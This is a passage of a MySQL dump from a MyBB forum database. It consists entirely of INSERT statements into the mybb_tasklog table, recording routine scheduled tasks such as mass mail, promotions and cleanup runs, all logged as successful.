mybb_tasklog VALUES('14489', '7', '1351909901', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14488', '5', '1351909901', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14487', '3', '1351909882', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14486', '1', '1351909884', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14485', '9', '1351909881', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14484', '5', '1351907910', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14483', '9', '1351906877', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14482', '3', '1351906200', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14481', '9', '1351905920', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14480', '5', '1351905915', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14479', '9', '1351905031', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14478', '5', '1351905018', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14477', '7', '1351905018', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14476', '1', '1351905009', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14475', '3', '1351904954', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14474', '9', '1351904952', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14473', '5', '1351904295', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14472', '9', '1351901606', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14471', '5', '1351901582', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14470', '7', '1351901571', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14469', '2', '1351901083', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14468', '1', '1351901064', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14467', '3', '1351901029', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14466', '9', '1351900948', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14465', '3', '1351899906', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14464', '5', '1351899902', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14463', '9', '1351899722', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14462', '5', '1351897508', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14461', '7', '1351897250', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14460', '1', '1351897234', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14459', '3', '1351897165', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14458', '9', '1351897091', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14457', '5', '1351896413', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14456', '9', '1351896408', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14455', '3', '1351895730', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14454', '9', '1351895320', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14453', '5', '1351895315', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14452', '9', '1351894233', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14451', '5', '1351893968', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14450', '7', '1351893966', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14449', '1', '1351893960', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14448', '3', '1351893952', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14447', '9', '1351893949', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14446', '5', '1351892712', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14445', '9', '1351892560', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14444', '3', '1351891845', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14443', '9', '1351891716', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14442', '5', '1351891589', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14441', '9', '1351890638', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14440', '5', '1351890529', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14439', '7', '1351890092', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14438', '1', '1351890083', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14437', '3', '1351890071', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14436', '9', '1351889749', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14435', '5', '1351889740', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14434', '9', '1351889402', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14433', '3', '1351888215', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14432', '9', '1351888012', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14431', '5', '1351887949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14430', '9', '1351887199', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14429', '5', '1351886701', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14428', '7', '1351886690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14427', '1', '1351886685', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14426', '3', '1351886680', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14425', '9', '1351886294', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14424', '5', '1351885604', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14423', '3', '1351885602', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14422', '9', '1351885602', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14421', '5', '1351884607', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14420', '5', '1351884071', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14419', '7', '1351884068', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14418', '1', '1351884065', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14417', '3', '1351884054', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14416', '9', '1351884048', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14415', '5', '1351882371', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14414', '9', '1351882288', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14413', '3', '1351881025', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14412', '9', '1351881014', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14411', '5', '1351880912', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14410', '9', '1351880469', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14409', '5', '1351880446', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14408', '7', '1351879483', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14407', '1', '1351879401', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14406', '3', '1351879399', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14405', '9', '1351879397', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14404', '5', '1351878613', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14403', '9', '1351878053', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14402', '3', '1351877493', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14401', '9', '1351877109', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14400', '5', '1351877105', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14399', '9', '1351876274', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14398', '5', '1351875944', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14397', '7', '1351875629', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14396', '1', '1351875614', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14395', '3', '1351875541', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14394', '9', '1351875430', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14393', '5', '1351874926', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14392', '9', '1351874445', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14391', '3', '1351874011', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14390', '9', '1351874006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14389', '5', '1351873569', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14388', '9', '1351873039', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14387', '5', '1351872819', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14386', '7', '1351872594', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14385', '1', '1351872356', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14384', '3', '1351872321', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14383', '5', '1351871774', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14382', '9', '1351871766', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14381', '3', '1351870577', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14380', '9', '1351870545', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14379', '5', '1351870527', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14378', '9', '1351869458', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14377', '5', '1351869119', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14376', '7', '1351869098', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14375', '1', '1351868732', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14374', '3', '1351868631', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14373', '9', '1351868426', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14372', '5', '1351867593', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14371', '9', '1351867573', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14370', '3', '1351867478', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14369', '5', '1351867285', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14368', '9', '1351867189', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14367', '5', '1351865115', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14366', '7', '1351864908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14365', '1', '1351864885', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14364', '3', '1351864858', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14363', '9', '1351864837', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14362', '3', '1351864171', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14361', '9', '1351864159', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14360', '5', '1351864135', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14359', '7', '1351862300', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14358', '1', '1351862232', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14357', '3', '1351862210', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14356', '9', '1351862173', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14355', '5', '1351860430', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14354', '3', '1351860425', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14353', '9', '1351860408', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14352', '5', '1351860283', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14351', '9', '1351858551', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14350', '5', '1351858079', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14349', '7', '1351857858', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14348', '1', '1351857670', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14347', '3', '1351857663', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14346', '9', '1351857424', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14345', '3', '1351856950', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14344', '5', '1351856940', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14343', '9', '1351856937', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14342', '5', '1351854321', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14341', '7', '1351854142', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14340', '1', '1351854082', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14339', '3', '1351854071', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14338', '9', '1351853725', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14337', '5', '1351853158', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14336', '9', '1351853066', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14335', '5', '1351852739', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14334', '7', '1351852699', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14333', '1', '1351852653', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14332', '3', '1351852649', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14331', '9', '1351852426', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14330', '5', '1351850965', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14329', '9', '1351849701', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14328', '3', '1351848679', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14327', '9', '1351848330', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14326', '5', '1351848307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14325', '9', '1351848178', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14324', '5', '1351848119', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14323', '7', '1351847161', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14322', '1', '1351846969', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14321', '3', '1351846945', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14320', '9', '1351846933', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14319', '5', '1351846846', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14318', '9', '1351846193', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14317', '3', '1351846028', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14316', '9', '1351845328', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14315', '5', '1351845307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14314', '5', '1351843919', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14313', '7', '1351843914', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14312', '1', '1351843911', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14311', '3', '1351843909', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14310', '9', '1351843900', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14309', '5', '1351842329', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14308', '3', '1351842311', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14307', '9', '1351842171', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14306', '5', '1351842149', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14305', '7', '1351841961', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14304', '1', '1351841422', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14303', '3', '1351841303', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14302', '5', '1351840888', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14301', '9', '1351840803', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14300', '3', '1351837930', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14299', '9', '1351837541', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14298', '5', '1351837524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14297', '9', '1351836698', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14296', '5', '1351836529', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14295', '7', '1351836045', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14294', '1', '1351836031', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14293', '3', '1351835945', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14292', '9', '1351835843', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14291', '5', '1351835138', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14290', '9', '1351835119', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14289', '3', '1351834257', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14288', '9', '1351833958', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14287', '5', '1351833922', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14286', '9', '1351833007', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14285', '5', '1351832976', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14284', '7', '1351832869', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14283', '1', '1351832842', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14282', '3', '1351832833', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14281', '9', '1351832825', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14280', '5', '1351831524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14279', '3', '1351831482', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14278', '5', '1351831479', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14277', '9', '1351831465', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14276', '5', '1351829404', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14275', '7', '1351828852', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14274', '1', '1351828823', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14273', '3', '1351828821', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14272', '5', '1351828631', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14271', '9', '1351828584', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14270', '3', '1351827029', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14269', '5', '1351827007', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14268', '7', '1351827004', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14267', '1', '1351826979', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14266', '3', '1351826975', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14265', '9', '1351826970', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14264', '5', '1351825125', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14263', '9', '1351824188', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14262', '3', '1351823599', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14261', '9', '1351823134', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14260', '5', '1351823119', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14259', '7', '1351822759', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14258', '1', '1351822731', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14257', '3', '1351822730', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14256', '9', '1351822722', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14255', '5', '1351822705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14254', '9', '1351820735', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14253', '3', '1351819935', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14252', '9', '1351819874', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14251', '5', '1351819791', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14250', '9', '1351819195', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14249', '5', '1351818560', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14248', '7', '1351818148', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14247', '1', '1351818140', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14246', '3', '1351818130', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14245', '9', '1351817741', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14244', '5', '1351817503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14243', '9', '1351817499', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14242', '3', '1351817488', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14241', '9', '1351815947', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14240', '7', '1351815943', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14239', '5', '1351815943', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14238', '2', '1351815943', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14237', '1', '1351815141', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14236', '3', '1351814551', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14235', '5', '1351814272', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14234', '9', '1351814270', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14233', '3', '1351812626', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14232', '9', '1351812599', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14231', '5', '1351812345', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14230', '9', '1351812070', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14229', '5', '1351811346', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14228', '7', '1351811330', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14227', '1', '1351811198', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14226', '3', '1351810780', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14225', '9', '1351810702', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14224', '5', '1351810061', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14223', '9', '1351810051', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14222', '3', '1351809085', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14221', '9', '1351808719', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14220', '5', '1351808708', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14219', '9', '1351808283', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14218', '5', '1351808171', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14217', '7', '1351807208', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14216', '1', '1351807204', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14215', '3', '1351807142', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14214', '9', '1351807044', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14213', '5', '1351806315', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14212', '9', '1351806253', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14211', '3', '1351805580', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14210', '9', '1351805230', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14209', '5', '1351805210', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14208', '9', '1351804319', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14207', '5', '1351804270', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14206', '7', '1351804144', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14205', '1', '1351803617', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14204', '3', '1351803610', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14203', '9', '1351803602', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14202', '5', '1351803581', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14201', '9', '1351802432', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14200', '3', '1351802006', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14199', '5', '1351801851', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14198', '9', '1351801831', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14197', '5', '1351800316', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14196', '7', '1351800018', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14195', '1', '1351800011', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14194', '3', '1351799994', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14193', '9', '1351799736', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14192', '5', '1351799114', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14191', '9', '1351798854', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14190', '3', '1351798250', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14189', '9', '1351798235', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14188', '5', '1351798217', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14187', '9', '1351797036', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14186', '5', '1351796825', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14185', '7', '1351796817', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14184', '1', '1351796727', 'The 